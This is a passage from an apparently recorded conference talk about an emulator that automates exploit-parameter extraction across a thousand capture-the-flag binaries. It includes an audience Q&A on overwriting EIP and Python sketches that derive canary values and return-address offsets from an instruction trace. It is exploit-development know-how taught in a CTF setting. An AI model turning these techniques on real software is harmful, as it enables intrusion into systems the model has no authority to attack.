I wrapped that in a loop. Do it for every five minutes. And now I'm in the current directory and I've got my thousand exploit parameters and I'm ready to connect to the remote side. Okay. So, for the future, and very quickly.
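Going back to the parameter dictionary described above, a minimal Python sketch of the idea follows: each batch run appends one dictionary-entry line to an output file, and the exploit side later parses the accumulated lines into a single dictionary keyed by binary name. The function names, the key names, and the sample binary names are all hypothetical; the talk only says that the parameters were written out as Python dictionary entries keyed by the name of the binary.

```python
import ast


def format_entry(binary_name, params):
    """Render one binary's parameters as a line of dict-literal text."""
    return "%r: %r," % (binary_name, params)


def load_params(text):
    """Parse the accumulated entry lines back into one dictionary.

    ast.literal_eval only accepts Python literals, so the output file
    is treated as data rather than being executed as code.
    """
    return ast.literal_eval("{" + text + "}")


# Two entries as they might be appended by two separate batch runs.
lines = [
    format_entry("binary_0001", {"canary": b"s3cret", "canary_offset": 32,
                                 "ret_offset": 68}),
    format_entry("binary_0002", {"canary": b"hunter2", "canary_offset": 48,
                                 "ret_offset": 92}),
]
table = load_params("\n".join(lines))

# At exploit time the name handed over by the remote side is the key.
chosen = table["binary_0002"]
```

Keeping one entry per line means a batch run that fails on one binary costs only that binary's entry, and the file can be tailed while the loop is still running.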
A better user interface when launching the emulator. It'd be nice to be able to specify some register state. Right now I just take a guess. Where do you want to start your emulation? Do you want any register to have particular values? So I'd like to have that done up. Some options for mapping in particular memory regions or loading other regions. If you're familiar with IDA and debuggers, there's a very useful interface called Appcall that actually lets you incorporate functions, or call them almost natively, from IDAPython: call out and have your function run and then spit the value back to you in your scripts. I'd like to have a hooking library, to be able to hook various functions and do things maybe other than what the emulator is doing, or provide shims for the emulator. I'd like to have a library for library calls or system calls, things like that. And also perhaps add the option to go ahead and pull in all of the shared libraries that a dynamically linked binary might link to, so you can follow the library calls down into a shared library function and emulate your way through those, if you wanted to do so, rather than writing all the shims for them. It's out there on GitHub. It's out there today. I will push all the latest changes shortly after the con, but if you're interested, I'm always interested in feedback. If you want to collaborate, I'd love to hear from you. If you have ideas on features that might make it more useful and you don't want to implement them, at least share them with me and maybe I'll get around to them, or find somebody who might like to implement any of your ideas. And that's it, and I'm happy to take questions, and if there are no questions, please enjoy the rest of your con. Do we have microphones somewhere for questions? Yeah, I'm supposed to direct you to a microphone so it gets picked up. You can come, if you want to come up here.
Microphone is, oh, it's right here, it's right over here. Drink, don't forget your drink. That's right. Hello. A couple of slides back you mentioned the two console output windows. That's the wrong way. How do you recognize what magic four bytes overwrite EIP, and how do you deal with bad characters? When I was doing the scripted demo, what I had to do was study a couple of the binaries manually, right, not a thousand of them, but I looked at two or three of them. I looked at the first one and said, well, this is clearly an easy stack overflow; if it was just this one, I understand exactly how I would exploit it. Then I looked at another one and said, oh, this one is subtly different. What's different about it, and can I develop an analysis that walks through the program and at certain key points in the program picks off certain things for me? So what are the parameters, where is that buffer getting copied? Really, the string copy, or the string compare, gives it all away. It tells me the start of the user buffer and the start of the canary buffer, and from there what I can do is some math to figure out where saved EIP was. Okay, third binary, right, all the way up to the end of the program, and then the second binary, and all of these things again looking similar. And so I took what I had learned from looking at three binaries, developed an automated process that I would apply to the three binaries, and then it extended nice and neatly to the thousand binaries, which was roughly what they intended. What they wanted to do was force you to do it quickly, right? If you tried to reverse engineer all thousand to develop these answers, you wouldn't have finished in the weekend. Okay, so does that answer your question? Yeah, yeah. Now, I'm assuming that's the logic you have to hard code into the program? Yeah.
Okay, so that's the logic that you have to bake into the script that you write. So through here are some various things that I was looking for, like extracting some register values. I'm stepping one instruction at a time. I'm asking, you know, am I at certain types of instructions? I'm counting the number of calls that I've encountered, because, you know, the third call down the chain was going to be the strcpy. And when I got to the strcpy, or the string compare, you could see what was going on with the string, and then what I'm doing is picking some arguments off the stack that have been placed there, that they're passing to the string compare, and then I'm using that to derive all the information I need to craft the exploit parameters. Okay, awesome, thank you. Sure. Any other questions? He's trying to get me out of here. I think we're done. Thanks very much. I'll be happy to talk to you off the side of the stage. Thank you.
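The script logic described in that last answer (single-step, count calls, and read the arguments off the stack at the interesting call) can be sketched in plain Python without IDA. This is an illustrative model only, not the speaker's script: the recorded `trace` of `(mnemonic, esp, ebp)` tuples stands in for single-stepping a real debugger session, the argument order (user buffer first, canary buffer second) is an assumption, and the saved-EIP arithmetic assumes a conventional 32-bit x86 frame in which the return address sits at `ebp + 4`.

```python
import struct


def read_u32(mem, base, addr):
    """Read a little-endian 32-bit value from a flat memory image."""
    return struct.unpack_from("<I", mem, addr - base)[0]


def read_cstring(mem, base, addr):
    """Read a NUL-terminated byte string from a flat memory image."""
    start = addr - base
    end = mem.index(b"\x00", start)
    return bytes(mem[start:end])


def derive_params(trace, nth_call, mem, base):
    """Walk a recorded single-step trace and stop at the nth call.

    Each trace item is (mnemonic, esp, ebp), captured before the
    instruction executes, so at a call the outgoing arguments sit at
    [esp] and [esp + 4] under the cdecl convention.
    """
    calls = 0
    for mnemonic, esp, ebp in trace:
        if mnemonic != "call":
            continue
        calls += 1
        if calls < nth_call:
            continue
        user_buf = read_u32(mem, base, esp)        # assumed first argument
        canary_buf = read_u32(mem, base, esp + 4)  # assumed second argument
        return {
            "canary": read_cstring(mem, base, canary_buf),
            "canary_offset": canary_buf - user_buf,
            "ret_offset": (ebp + 4) - user_buf,    # assumes standard frame
        }
    raise LookupError("trace ended before call number %d" % nth_call)


# A tiny hand-built memory image and trace to exercise the logic.
BASE = 0x1000
memory = bytearray(0x100)
struct.pack_into("<II", memory, 0x1040 - BASE, 0x1060, 0x1080)
memory[0x1080 - BASE:0x1080 - BASE + 7] = b"s3cret\x00"

trace = [
    ("push", 0x1048, 0x10A0),
    ("call", 0x1044, 0x10A0),
    ("mov", 0x1044, 0x10A0),
    ("call", 0x1044, 0x10A0),
    ("lea", 0x1040, 0x10A0),
    ("call", 0x1040, 0x10A0),
]
params = derive_params(trace, 3, memory, BASE)
```

Counting calls is brittle if a binary deviates from the common pattern, which is why the talk describes checking the approach by hand against a few samples before trusting it across all of them.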